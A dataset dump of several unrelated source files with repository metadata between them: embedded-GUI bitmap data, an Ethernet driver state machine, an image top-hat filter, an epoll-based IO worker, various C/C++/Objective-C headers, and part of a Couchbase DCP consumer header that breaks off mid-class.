0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861, 0x1861
};
GUI_CONST_STORAGE GUI_BITMAP bmco2_font = {
38, /* XSize */
17, /* YSize */
76, /* BytesPerLine */
16, /* BitsPerPixel */
(unsigned char *)acco2_font, /* Pointer to picture data */
NULL, /* Pointer to palette */
GUI_DRAW_BMP565
};
/* *** End of file *** */
| 91.493671 | 251 | 0.610266 |
0ecb549367b753101f490544f347432ac3256b9e | 809 | h | C | genecode/genecode/Fleet.h | AlexeyTyurenkov/GeneCode | 08ca7e9c909dca237c8004371892954b632920f4 | [
"MIT"
] | null | null | null | genecode/genecode/Fleet.h | AlexeyTyurenkov/GeneCode | 08ca7e9c909dca237c8004371892954b632920f4 | [
"MIT"
] | null | null | null | genecode/genecode/Fleet.h | AlexeyTyurenkov/GeneCode | 08ca7e9c909dca237c8004371892954b632920f4 | [
"MIT"
] | null | null | null | //
// Fleet.h
// etc
//
// Created by Oleksii Tiurenkov on 9/30/15.
// Copyright (c) 2015 Oleksii Tiurenkov. All rights reserved.
//
#ifndef __etc__Fleet__
#define __etc__Fleet__
#include "GLOBAL_CONST.h"
class Ship;
typedef uint16_t shima_t;
enum BattleResult: uint8_t {
FAIL = 0,
MINORDRAW = 1,
DRAW = 2,
WIN = 3
} ;
class Fleet
{
private:
std::vector<std::shared_ptr<Ship>> ships;
int quality = 0;
bool canFire();
void salvo(std::vector<Shoot>& salvo, Fleet* enemy);
void compress();
public:
Fleet(std::vector<shima_t>);
BattleResult result(Fleet *other);
~Fleet();
size_t visibleCount();
std::shared_ptr<Ship> randomShip();
void print();
std::string json(uint64_t score);
};
#endif /* defined(__etc__Fleet__) */
| 16.510204 | 62 | 0.63288 |
e310628582d30197e7617dfb61f0ed91467392f3 | 5,952 | c | C | apps/tcpip_tcp_server/firmware/src/config/pic32mz_ef_sk_encx24j600/driver/encx24j600/src/dynamic/running_state/drv_encx24j600_reset_rx_state.c | carlosearm/net_apps_pic32mz | f6f36ead86f7a41f59dc52a4aec5a4108718f63f | [
"0BSD"
] | null | null | null | apps/tcpip_tcp_server/firmware/src/config/pic32mz_ef_sk_encx24j600/driver/encx24j600/src/dynamic/running_state/drv_encx24j600_reset_rx_state.c | carlosearm/net_apps_pic32mz | f6f36ead86f7a41f59dc52a4aec5a4108718f63f | [
"0BSD"
] | 2 | 2021-02-16T20:26:10.000Z | 2022-01-05T15:19:32.000Z | apps/tcpip_tcp_client/firmware/src/config/pic32mx_eth_sk2_encx24j600/driver/encx24j600/src/dynamic/running_state/drv_encx24j600_reset_rx_state.c | Microchip-MPLAB-Harmony/net_apps_pic32mx | 004772bd2226b3e778af937505a86cf845c5b850 | [
"0BSD"
] | 6 | 2021-02-02T13:51:49.000Z | 2021-08-31T18:35:37.000Z | /*******************************************************************************
ENCx24J600 Check TX Status State Machine
Company:
Microchip Technology Inc.
File Name:
drv_encx24j600_check_tx_status_state.c
Summary:
Description:
*******************************************************************************/
// DOM-IGNORE-BEGIN
/*****************************************************************************
Copyright (C) 2014-2018 Microchip Technology Inc. and its subsidiaries.
Microchip Technology Inc. and its subsidiaries.
Subject to your compliance with these terms, you may use Microchip software
and any derivatives exclusively with Microchip products. It is your
responsibility to comply with third party license terms applicable to your
use of third party software (including open source software) that may
accompany Microchip software.
THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A PARTICULAR
PURPOSE.
IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
*****************************************************************************/
// DOM-IGNORE-END
#include "drv_encx24j600_reset_rx_state.h"
#include "../drv_encx24j600_local.h"
#include "../drv_encx24j600_utils.h"
#include "drv_encx24j600_running_state.h"
int32_t DRV_ENCX24J600_ResetRxStateTask(struct _DRV_ENCX24J600_DriverInfo * pDrvInst)
{
DRV_ENCX24J600_RESET_RX_INFO * curSt = &(pDrvInst->mainStateInfo.runningInfo.resetRxInfo);
DRV_ENCX24J600_RegUnion reg = {0};
uintptr_t ret;
switch (curSt->state)
{
case DRV_ENCX24J600_RRX_WAIT:
break;
case DRV_ENCX24J600_RRX_STARTING:
curSt->state = DRV_ENCX24J600_RRX_SET_RXRST;
case DRV_ENCX24J600_RRX_SET_RXRST:
{
reg.value = 0;
reg.econ2.RXRST = 1;
ret = (*pDrvInst->busVTable->fpSfrBitSet)(pDrvInst, DRV_ENCX24J600_SFR_ECON2, reg, DRV_ENCX24J600_RRX_OP_SET_RXRST);
if (ret != 0)
{
curSt->state = DRV_ENCX24J600_RRX_RESET_RXRST;
}
else
{
break;
}
}
case DRV_ENCX24J600_RRX_RESET_RXRST:
{
reg.value = 0;
reg.econ2.RXRST = 1;
ret = (*pDrvInst->busVTable->fpSfrBitClr)(pDrvInst, DRV_ENCX24J600_SFR_ECON2, reg, DRV_ENCX24J600_RRX_OP_CLEAR_RXRST);
if (ret != 0)
{
curSt->state = DRV_ENCX24J600_RRX_READ_ESTAT_START;
}
else
{
break;
}
}
case DRV_ENCX24J600_RRX_READ_ESTAT_START:
{
ret = (*pDrvInst->busVTable->fpSfrRdStart)(pDrvInst, DRV_ENCX24J600_SFR_ESTAT, DRV_ENCX24J600_RRX_OP_READ_ESTAT);
if (ret != 0)
{
curSt->state = DRV_ENCX24J600_RRX_READ_ESTAT_WAIT;
curSt->estatOp = ret;
}
else
{
break;
}
}
case DRV_ENCX24J600_RRX_READ_ESTAT_WAIT:
{
if (_DRV_ENCX24J600_ReadSfr(pDrvInst, curSt->estatOp, ®, DRV_ENCX24J600_CS_OP_READ_ESTAT))
{
if (reg.estat.PKTCNT == 0)
{
curSt->state = DRV_ENCX24J600_RRX_SET_ERXST;
}
else
{
uint8_t x = 0;
for (x = 0; x < reg.estat.PKTCNT; x++)
{
ret = (*pDrvInst->busVTable->fpDecPktCnt)(pDrvInst);
if (ret == 0)
{
break;
}
}
curSt->state = DRV_ENCX24J600_RRX_READ_ESTAT_START;
break;
}
}
else
{
break;
}
}
case DRV_ENCX24J600_RRX_SET_ERXST:
{
reg.value = 0;
reg.erxst.ERXST = pDrvInst->encMemRxStart;
ret = (*pDrvInst->busVTable->fpSfrWr)(pDrvInst, DRV_ENCX24J600_SFR_ERXST, reg, DRV_ENCX24J600_CS_OP_SET_ERXST);
if (ret != 0)
{
curSt->state = DRV_ENCX24J600_RRX_SET_ERXTAIL;
}
else
{
break;
}
}
case DRV_ENCX24J600_RRX_SET_ERXTAIL:
{
reg.value = 0;
reg.erxtail.ERXTAIL = pDrvInst->encMemRxEnd - 2;
ret = (*pDrvInst->busVTable->fpSfrWr)(pDrvInst, DRV_ENCX24J600_SFR_ERXTAIL, reg, DRV_ENCX24J600_CS_OP_SET_ERXTAIL);
if (ret != 0)
{
curSt->state = DRV_ENCX24J600_RRX_SET_RXEN;
}
else
{
break;
}
}
case DRV_ENCX24J600_RRX_SET_RXEN:
{
ret = (*pDrvInst->busVTable->fpRxEnable)(pDrvInst);
if (ret != 0)
{
curSt->state = DRV_ENCX24J600_RRX_WAIT;
}
break;
}
default:
break;
}
return 0;
} | 35.855422 | 131 | 0.518145 |
6bcfb265ba6aef9b2c63c59f52429a7d2e4fc0af | 450 | h | C | iPad Contract (Horizontal) /ChoiceViewController.h | DCAdams103/Contract-App | 04260481dfbd72a3001eb7921e00b8fcf79d99be | [
"MIT"
] | null | null | null | iPad Contract (Horizontal) /ChoiceViewController.h | DCAdams103/Contract-App | 04260481dfbd72a3001eb7921e00b8fcf79d99be | [
"MIT"
] | null | null | null | iPad Contract (Horizontal) /ChoiceViewController.h | DCAdams103/Contract-App | 04260481dfbd72a3001eb7921e00b8fcf79d99be | [
"MIT"
] | null | null | null | //
// ChoiceViewController.h
// Contract
//
// Created by Dylan Adams on 11/1/16.
// Copyright © 2016 Dylan Adams. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface ChoiceViewController : UIViewController
-(IBAction)goToSpring2017:(id)sender;
//-(IBAction)goToSummer2017:(id)sender;
-(IBAction)goToFall2017:(id)sender;
//@property (nonatomic, assign) BOOL _017SummerChosen;
@property (nonatomic, assign) BOOL _017FallChosen;
@end
| 19.565217 | 54 | 0.737778 |
ace3fe5039509fe7a2de3380f467d9f47766238d | 2,402 | c | C | tophat.c | snapfinger/Retinal-Vessel-Segmentaion | 8c464b9ca284cd5cd5a0a81099535eab8d9b7899 | [
"MIT"
] | 2 | 2019-11-07T03:40:06.000Z | 2020-07-31T09:47:46.000Z | tophat.c | snapfinger/Retinal-Vessel-Segmentaion | 8c464b9ca284cd5cd5a0a81099535eab8d9b7899 | [
"MIT"
] | null | null | null | tophat.c | snapfinger/Retinal-Vessel-Segmentaion | 8c464b9ca284cd5cd5a0a81099535eab8d9b7899 | [
"MIT"
] | 1 | 2019-01-07T06:36:15.000Z | 2019-01-07T06:36:15.000Z | /*
implement the top-hat transformation for gray-scale image
structure element is a disk
*/
#include "VisXV4.h" /* VisX structure include file */
#include "Vutil.h" /* VisX utility header files */
#include <stdbool.h>
VXparam_t par[] =
{
{ "if=", 0, " input file"},
{ "of=", 0, " output file"},
{ "s=", 0, " size of structure element"}, //disk structure element default
{ 0, 0, 0}
};
#define IVAL par[0].val
#define OVAL par[1].val
#define SIZE par[2].val
main(argc, argv)
int argc;
char *argv[];
{
Vfstruct (im); /* i/o image structure */
Vfstruct (tm1); /* temp image structure */
Vfstruct (tm2); /* temp image structure */
Vfstruct (tm3); /* temp image structure */
VXparse(&argc, &argv, par); /* parse the command line */
Vfread(&im,IVAL);
Vfembed(&tm1,&im,0,0,0,0); //for min
Vfembed(&tm2,&im,0,0,0,0); //for max
Vfembed(&tm3,&im,0,0,0,0); //for output
int radius=atoi(SIZE);
fprintf(stderr,"top-hat se radius size: %d\n",radius);
int y,x;//image index
//first min
for(y=im.ylo;y<=im.yhi;y++){
int y0=im.ylo>y-radius?im.ylo:y-radius;
int y1=im.yhi<y+radius?im.yhi:y+radius;
for(x=im.xlo;x<=im.xhi;x++){
int x0=im.xlo>x-radius?im.xlo:x-radius;
int x1=im.xhi<x+radius?im.xhi:x+radius;
int minVal=im.u[y][x];
int u,v;
for(u=y0;u<=y1;u++){
for(v=x0;v<=x1;v++){
if((y-u)*(y-u)+(x-v)*(x-v)<=radius*radius && im.u[u][v]<minVal){
minVal=im.u[u][v];
//fprintf(stderr,"coordinate: %d %d\n",u,v);
}
}
}
tm1.u[y][x]=minVal;
}
}
//max filter
for(y=tm1.ylo;y<=tm1.yhi;y++){
int y0=tm1.ylo>y-radius?tm1.ylo:y-radius;
int y1=tm1.yhi<y+radius?tm1.yhi:y+radius;
for(x=tm1.xlo;x<=tm1.xhi;x++){
int x0=tm1.xlo>x-radius?tm1.xlo:x-radius;
int x1=tm1.xhi<x+radius?tm1.xhi:x+radius;
int maxVal=tm1.u[y][x];
int u,v;
for(u=y0;u<=x1;u++){
for(v=y0;v<=y1;v++){
if((y-u)*(y-u)+(x-v)*(x-v)<=radius*radius && tm1.u[u][v]>maxVal){
maxVal=tm1.u[u][v];
}
}
}
tm2.u[y][x]=maxVal;
}
}
for(y=tm2.ylo;y<=tm2.yhi;y++){
for(x=tm2.xlo;x<=tm2.xhi;x++){
tm3.u[y][x]=im.u[y][x]-tm2.u[y][x];
}
}
fprintf(stderr,"top-hat transformation completed\n");
Vfwrite(&tm3, OVAL);
exit(0);
}
| 22.036697 | 82 | 0.537885 |
5c75918cf4a9d6d89ff0c9afaed35f51e3facbc1 | 1,322 | h | C | COM203/2014-08/Pong/Ogre Project/Ball.h | Neo-Desktop/Coleman-Code | 5f453709874be518040ca46a097f974085d6475d | [
"MIT"
] | 2 | 2021-09-03T13:20:35.000Z | 2021-10-03T04:22:31.000Z | COM203/2014-08/Pong/Ogre Project/Ball.h | Neo-Desktop/Coleman-Code | 5f453709874be518040ca46a097f974085d6475d | [
"MIT"
] | null | null | null | COM203/2014-08/Pong/Ogre Project/Ball.h | Neo-Desktop/Coleman-Code | 5f453709874be518040ca46a097f974085d6475d | [
"MIT"
] | null | null | null | // Ball.h
// Ball class definition (represents a bouncing ball).
#ifndef BALL_H
#define BALL_H
#include <Ogre.h> // Ogre class definition
using namespace Ogre; // use the Ogre namespace
#include <OgreAL.h> // OgreAL class definition
class Paddle; // forward declaration of class Paddle
const int RADIUS = 5; // the radius of the Ball
class Ball
{
public:
Ball( SceneManager *sceneManagerPtr ); // constructor
~Ball(); // destructor
void addToScene(); // add the Ball to the scene
void moveBall( Real time ); // move the Ball across the screen
private:
SceneManager *sceneManagerPtr; // pointer to the SceneManager
SceneNode *nodePtr; // pointer to the SceneNode
OgreAL::SoundManager *soundManagerPtr; // pointer to the SoundManager
OgreAL::Sound *wallSoundPtr; // sound played when Ball hits a wall
OgreAL::Sound *paddleSoundPtr; // sound played when Ball hits a Paddle
OgreAL::Sound *scoreSoundPtr; // sound played when someone scores
int speed; // speed of the Ball
Vector3 direction; // direction of the Ball
// private utility functions
void reverseHorizontalDirection(); // change horizontal direction
void reverseVerticalDirection(); // change vertical direction
void hitPaddle(); // control the Ball hitting the Paddles
}; // end class Ball
#endif // BALL_H
| 32.243902 | 73 | 0.727685 |
5c98175dcc575115774eb5ec77f024bc220300ac | 1,226 | h | C | config.h | xyz1396/Aerith | 802de0acb75537c7a0376efde578e870c2865c37 | [
"MIT"
] | null | null | null | config.h | xyz1396/Aerith | 802de0acb75537c7a0376efde578e870c2865c37 | [
"MIT"
] | null | null | null | config.h | xyz1396/Aerith | 802de0acb75537c7a0376efde578e870c2865c37 | [
"MIT"
] | null | null | null | #ifndef CONFIG_H
#define CONFIG_H
#include <QString>
#include <QList>
#include "mainwindow.h"
class config
{
public:
config();
QString searchName;
QString searchType;
QStringList fastaDB;
QStringList rawFiles;
QString fragmentationMethod;
QList<int> parentMassWindows;
int Minimum_Peptide_Length;
int Maximum_Peptide_Length;
float Search_Mass_Tolerance_Parent_Ion;
float Mass_Tolerance_Fragment_Ions;
QString Cleave_After_Residues;
QString Cleave_Before_Residues;
int Maximum_Missed_Cleavages;
bool Try_First_Methionine;
int Max_PTM_Count;
QString PTM_table;
QString Isotopic_table;
QString Training_Decoy_Prefix;
QString Testing_Decoy_Prefix;
bool FDR_Filtering;
float FDR_Threshold;
int Min_Peptide_Per_Protein;
int Min_Unique_Peptide_Per_Protein;
float Filter_Mass_Tolerance_Parent_Ion;
QString Filter_Mass_Tolerance_Parent_Ion_Unit;
void readJson();
void writeJson();
void readMainWindow(Ui::MainWindow *ui);
static config& getConfig();
config(const config& other) = delete;
config& operator=(const config& other) = delete;
};
#endif // CONFIG_H
| 26.652174 | 53 | 0.720228 |
38982373db00c4963f2768dbb8c3c0949a620be1 | 1,049 | h | C | Headers/Frameworks/Ozone/OZAudioMainThreadObject.h | CommandPost/FinalCutProFrameworks | d98b00ff0c84af80942d71514e9238d624aca50a | [
"MIT"
] | 3 | 2020-11-19T10:04:02.000Z | 2021-10-02T17:25:21.000Z | Headers/Frameworks/Ozone/OZAudioMainThreadObject.h | CommandPost/FinalCutProFrameworks | d98b00ff0c84af80942d71514e9238d624aca50a | [
"MIT"
] | null | null | null | Headers/Frameworks/Ozone/OZAudioMainThreadObject.h | CommandPost/FinalCutProFrameworks | d98b00ff0c84af80942d71514e9238d624aca50a | [
"MIT"
] | null | null | null | //
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Mar 11 2021 20:53:35).
//
// Copyright (C) 1997-2019 Steve Nygard.
//
#import <objc/NSObject.h>
@class NSTimer;
@interface OZAudioMainThreadObject : NSObject
{
struct OZAudioBehavior *_owner;
CDStruct_1b6d18a9 _startSample;
CDStruct_1b6d18a9 _lastSample;
CDStruct_1b6d18a9 _samplesInChunk;
NSTimer *_playbackTimer;
CDStruct_1b6d18a9 *_time;
CDStruct_1b6d18a9 _inPoint;
CDStruct_1b6d18a9 _outPoint;
}
- (void)stopTimer;
- (void)startTimer;
- (void)timerCallback:(id)arg1;
- (void)updateTimeRange;
- (void)setPlaybackTime:(CDStruct_1b6d18a9)arg1;
- (CDStruct_1b6d18a9)getPlaybackTime;
- (void)mainThreadCallback;
- (void)mainThreadProcessAborted;
- (void)mainThreadProcessDone;
- (void)mainThreadUpdateProgress;
- (void)setSamplesInChunk:(CDStruct_1b6d18a9)arg1;
- (void)setLastSample:(CDStruct_1b6d18a9)arg1;
- (void)setStartSample:(CDStruct_1b6d18a9)arg1;
- (void)setOwner:(struct OZAudioBehavior *)arg1;
- (void)dealloc;
- (id)init;
@end
| 24.97619 | 90 | 0.755005 |
36136b98439334fb87c21589995013c36b510b2f | 521 | h | C | GLEmotionKeyboard/GLEmotionKeyboard/Compose/Models/PPEmotionModel/PPEmotionModel.h | Jiaguanglei0418/GLEmotionKeyboard | 4c33ee80ed844cdc12d33ed96e1e9518483daead | [
"Apache-2.0"
] | 2 | 2016-01-27T08:49:16.000Z | 2016-01-29T10:53:44.000Z | PPZone/PPZone/Classes/Compose/Models/PPEmotionModel/PPEmotionModel.h | Jiaguanglei0418/PPZone | acfbfb1efde5f02b3981214126bb4f3c6bac54fe | [
"Apache-2.0"
] | null | null | null | PPZone/PPZone/Classes/Compose/Models/PPEmotionModel/PPEmotionModel.h | Jiaguanglei0418/PPZone | acfbfb1efde5f02b3981214126bb4f3c6bac54fe | [
"Apache-2.0"
] | null | null | null | //
// PPEmotionModel.h
// PPZone
//
// Created by jiaguanglei on 16/1/19.
// Copyright © 2016年 roseonly. All rights reserved.
//
#import <Foundation/Foundation.h>
/**
* <key>chs</key>
<string>[笑哈哈]</string>
<key>cht</key>
<string>[笑哈哈]</string>
<key>gif</key>
<string>lxh_xiaohaha.gif</string>
<key>png</key>
<string>lxh_xiaohaha.png</string>
*/
@interface PPEmotionModel : NSObject
// 文字描述
PROPERTYCOPY(NSString, chs)
// 图片名称
PROPERTYCOPY(NSString, png)
// emoj - 编码
PROPERTYCOPY(NSString, code)
@end
| 16.28125 | 52 | 0.675624 |
b1f73b75102bb4dd84f8c105f430738dc938997c | 4,916 | c | C | src/io_worker.c | JDrit/jullop | b230a8058ad84f58e71669aa60014c2e8eb754d3 | [
"Apache-2.0"
] | null | null | null | src/io_worker.c | JDrit/jullop | b230a8058ad84f58e71669aa60014c2e8eb754d3 | [
"Apache-2.0"
] | null | null | null | src/io_worker.c | JDrit/jullop | b230a8058ad84f58e71669aa60014c2e8eb754d3 | [
"Apache-2.0"
] | null | null | null | #define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/eventfd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/epoll.h>
#include <time.h>
#include <unistd.h>
#include "client.h"
#include "epoll_info.h"
#include "input_buffer.h"
#include "io_worker.h"
#include "logging.h"
#include "message_passing.h"
#include "output_buffer.h"
#include "queue.h"
#include "request_context.h"
#include "request_stats.h"
#define MAX_EVENTS 4096
SocketContext *init_context(Server *server, EpollInfo *epoll_info) {
SocketContext *socket_context = (SocketContext*) CHECK_MEM(malloc(sizeof(SocketContext)));
socket_context->server = server;
socket_context->epoll_info = epoll_info;
return socket_context;
}
void handle_accept_read(SocketContext *context) {
while (1) {
struct sockaddr_in in_addr;
socklen_t size = sizeof(in_addr);
int conn_sock = accept(context->data.fd, (struct sockaddr *) &in_addr, &size);
if (conn_sock == -1) {
if (ERROR_BLOCK) {
return;
} else {
FAIL("Failed to accept connection");
}
}
int opt = 1;
int r = setsockopt(conn_sock, SOL_TCP, TCP_NODELAY, &opt, sizeof(opt));
CHECK(r == -1, "Failed to set options on TCP_NODELAY");
r = setsockopt(conn_sock, SOL_TCP, TCP_QUICKACK, &opt, sizeof(opt));
CHECK(r == -1, "Failed to set options on TCP_QUICKACK");
fcntl(conn_sock, F_SETFL, O_NONBLOCK);
char* hbuf = (char*) CHECK_MEM(calloc(NI_MAXHOST, sizeof(char)));
char sbuf[NI_MAXSERV];
r = getnameinfo((struct sockaddr*) &in_addr, size, hbuf,
NI_MAXHOST * sizeof(char), sbuf,
sizeof(sbuf), NI_NUMERICHOST | NI_NUMERICSERV);
CHECK(r == -1, "Failed to get host name");
/* increments the counter of the total active requests. */
server_stats_incr_active_requests(context->server->server_stats);
RequestContext *request_context = init_request_context(conn_sock, hbuf,
context->epoll_info);
per_request_record_start(&request_context->time_stats, TOTAL_TIME);
SocketContext *connection_context = init_context(context->server, context->epoll_info);
connection_context->data.ptr = request_context;
connection_context->input_handler = client_handle_read;
connection_context->output_handler = NULL;
connection_context->error_handler = client_handle_error;
add_input_epoll_event(context->epoll_info, request_context->fd, connection_context);
}
}
void handle_accept_error(SocketContext *context, uint32_t events) {
LOG_ERROR("Accept socket ran into an error");
FAIL("this should not happen");
}
/**
* Runs the event loop and listens for connections on the given socket.
*/
void *io_event_loop(void *pthread_input) {
IoWorkerArgs *args = (IoWorkerArgs*) pthread_input;
int sock_fd = args->sock_fd;
Server *server = args->server;
/* make sure all application threads have started */
pthread_barrier_wait(&server->startup);
LOG_INFO("Starting IO thread");
const char *name = "IO-Thread";
EpollInfo *epoll_info = epoll_info_init(name, args->id);
/* Adds the epoll event for listening for new connections */
SocketContext *context = init_context(server, epoll_info);
context->data.fd = sock_fd;
context->input_handler = handle_accept_read;
context->output_handler = NULL;
context->error_handler = handle_accept_error;
add_input_epoll_event(epoll_info, sock_fd, context);
struct epoll_event events[MAX_EVENTS];
while (1) {
int ready_amount = epoll_wait(epoll_info->epoll_fd, events, MAX_EVENTS, -1);
if (ready_amount == -1) {
LOG_WARN("Failed to wait on epoll");
continue;
}
for (int i = 0 ; i < ready_amount ; i++) {
SocketContext *socket_context = (SocketContext*) events[i].data.ptr;
if (events[i].events & EPOLLERR
|| events[i].events & EPOLLRDHUP
|| events[i].events & EPOLLHUP
|| events[i].events & EPOLLPRI) {
if (socket_context->error_handler != NULL) {
/* Multiple events can happen to a listener at the same time. We
* should always check for error first and skip any other events
* for the same listener. */
socket_context->error_handler(socket_context, events[i].events);
} else {
LOG_WARN("epoll event did not have an error handler attached");
}
continue;
}
if (events[i].events & EPOLLIN) {
if (socket_context->input_handler != NULL) {
socket_context->input_handler(socket_context);
} else {
LOG_WARN("epoll event did not have an input handler attached");
}
}
if (events[i].events & EPOLLOUT) {
if (socket_context->output_handler != NULL) {
socket_context->output_handler(socket_context);
} else {
LOG_WARN("epoll event did not have an output handler attached");
}
}
}
}
return NULL;
}
| 30.918239 | 92 | 0.696298 |
d9de1f30b4f9437ad4355601b67f00bd79bb41cf | 8,002 | h | C | src/dcp/consumer.h | hisundar/ep-engine | 7f7cb5b4a5528c17ae10d2d5bb644885d1cd0837 | [
"Apache-2.0"
] | null | null | null | src/dcp/consumer.h | hisundar/ep-engine | 7f7cb5b4a5528c17ae10d2d5bb644885d1cd0837 | [
"Apache-2.0"
] | null | null | null | src/dcp/consumer.h | hisundar/ep-engine | 7f7cb5b4a5528c17ae10d2d5bb644885d1cd0837 | [
"Apache-2.0"
] | null | null | null | /* -*- Mode: C++; tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*- */
/*
* Copyright 2013 Couchbase, Inc
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef SRC_DCP_CONSUMER_H_
#define SRC_DCP_CONSUMER_H_ 1
#include "config.h"
#include <relaxed_atomic.h>
#include "connmap.h"
#include "dcp/dcp-types.h"
#include "dcp/flow-control.h"
#include "dcp/stream.h"
#include "tapconnection.h"
class DcpResponse;
class StreamEndResponse;
class DcpConsumer : public Consumer, public Notifiable {
typedef std::map<uint32_t, std::pair<uint32_t, uint16_t> > opaque_map;
public:
DcpConsumer(EventuallyPersistentEngine &e, const void *cookie,
const std::string &n);
~DcpConsumer();
ENGINE_ERROR_CODE addStream(uint32_t opaque, uint16_t vbucket,
uint32_t flags);
ENGINE_ERROR_CODE closeStream(uint32_t opaque, uint16_t vbucket);
ENGINE_ERROR_CODE streamEnd(uint32_t opaque, uint16_t vbucket,
uint32_t flags);
ENGINE_ERROR_CODE mutation(uint32_t opaque, const void* key, uint16_t nkey,
const void* value, uint32_t nvalue, uint64_t cas,
uint16_t vbucket, uint32_t flags,
uint8_t datatype, uint32_t locktime,
uint64_t bySeqno, uint64_t revSeqno,
uint32_t exptime, uint8_t nru, const void* meta,
uint16_t nmeta);
ENGINE_ERROR_CODE deletion(uint32_t opaque, const void* key, uint16_t nkey,
uint64_t cas, uint16_t vbucket, uint64_t bySeqno,
uint64_t revSeqno, const void* meta,
uint16_t nmeta);
ENGINE_ERROR_CODE expiration(uint32_t opaque, const void* key,
uint16_t nkey, uint64_t cas, uint16_t vbucket,
uint64_t bySeqno, uint64_t revSeqno,
const void* meta, uint16_t nmeta);
ENGINE_ERROR_CODE snapshotMarker(uint32_t opaque,
uint16_t vbucket,
uint64_t start_seqno,
uint64_t end_seqno,
uint32_t flags);
ENGINE_ERROR_CODE noop(uint32_t opaque);
ENGINE_ERROR_CODE flush(uint32_t opaque, uint16_t vbucket);
ENGINE_ERROR_CODE setVBucketState(uint32_t opaque, uint16_t vbucket,
vbucket_state_t state);
ENGINE_ERROR_CODE step(struct dcp_message_producers* producers);
ENGINE_ERROR_CODE handleResponse(protocol_binary_response_header *resp);
bool doRollback(uint32_t opaque, uint16_t vbid, uint64_t rollbackSeqno);
bool reconnectSlowStream(StreamEndResponse *resp);
void addStats(ADD_STAT add_stat, const void *c);
void aggregateQueueStats(ConnCounter& aggregator);
void notifyStreamReady(uint16_t vbucket);
void closeAllStreams();
void vbucketStateChanged(uint16_t vbucket, vbucket_state_t state);
process_items_error_t processBufferedItems();
uint64_t incrOpaqueCounter();
uint32_t getFlowControlBufSize();
void setFlowControlBufSize(uint32_t newSize);
static const std::string& getControlMsgKey(void);
bool isStreamPresent(uint16_t vbucket);
void cancelTask();
void taskCancelled();
bool notifiedProcesser(bool to);
void setProcesserTaskState(enum process_items_error_t to);
std::string getProcesserTaskStatusStr();
/**
* Check if the enough bytes have been removed from the
* flow control buffer, for the consumer to send an ACK
* back to the producer.
*
* @param schedule true if the notification is to be
* scheduled
*/
void notifyConsumerIfNecessary(bool schedule);
protected:
/**
* Records when the consumer last received a message from producer.
* It is used to detect dead connections. The connection is closed
* if a message, including a No-Op message, is not seen in a period
* equal to twice the "noop interval".
* It is protected so we can access from MockDcpConsumer, for
* for testing purposes.
*/
rel_time_t lastMessageTime;
private:
// Searches the streams map for a stream for vbucket ID. Returns the found
// stream, or an empty pointer if none found.
SingleThreadedRCPtr<PassiveStream> findStream(uint16_t vbid);
DcpResponse* getNextItem();
/**
* Check if the provided opaque id is one of the
* current open "session" id's
*
* @param opaque the provided opaque
* @param vbucket the provided vbucket
* @return true if the session is open, false otherwise
*/
bool isValidOpaque(uint32_t opaque, uint16_t vbucket);
void streamAccepted(uint32_t opaque, uint16_t status, uint8_t* body,
uint32_t bodylen);
ENGINE_ERROR_CODE handleNoop(struct dcp_message_producers* producers);
ENGINE_ERROR_CODE handlePriority(struct dcp_message_producers* producers);
ENGINE_ERROR_CODE handleExtMetaData(struct dcp_message_producers* producers);
ENGINE_ERROR_CODE handleValueCompression(struct dcp_message_producers* producers);
ENGINE_ERROR_CODE supportCursorDropping(struct dcp_message_producers* producers);
void notifyVbucketReady(uint16_t vbucket);
uint64_t opaqueCounter;
size_t processerTaskId;
std::atomic<enum process_items_error_t> processerTaskState;
DcpReadyQueue vbReady;
std::atomic<bool> processerNotification;
std::mutex readyMutex;
std::list<uint16_t> ready;
// Map of vbid -> passive stream. Map itself is atomic (thread-safe).
typedef AtomicUnorderedMap<uint16_t,
SingleThreadedRCPtr<PassiveStream>> PassiveStreamMap;
PassiveStreamMap streams;
opaque_map opaqueMap_;
Couchbase::RelaxedAtomic<uint32_t> backoffs;
uint32_t noopInterval;
bool pendingEnableNoop;
bool pendingSendNoopInterval;
bool pendingSetPriority;
bool pendingEnableExtMetaData;
bool pendingEnableValueCompression;
bool pendingSupportCursorDropping;
std::atomic<bool> taskAlreadyCancelled;
FlowControl flowControl;
static const std::string noopCtrlMsg;
static const std::string noopIntervalCtrlMsg;
static const std::string connBufferCtrlMsg;
static const std::string priorityCtrlMsg;
static const std::string extMetadataCtrlMsg;
static const std::string valueCompressionCtrlMsg;
static const std::string cursorDroppingCtrlMsg;
};
/*
* Task that orchestrates rollback on Consumer,
* runs in background.
*/
class RollbackTask : public GlobalTask {
public:
RollbackTask(EventuallyPersistentEngine* e,
uint32_t opaque_, uint16_t vbid_,
uint64_t rollbackSeqno_, dcp_consumer_t conn,
const Priority &p):
GlobalTask(e, p, 0, false), engine(e),
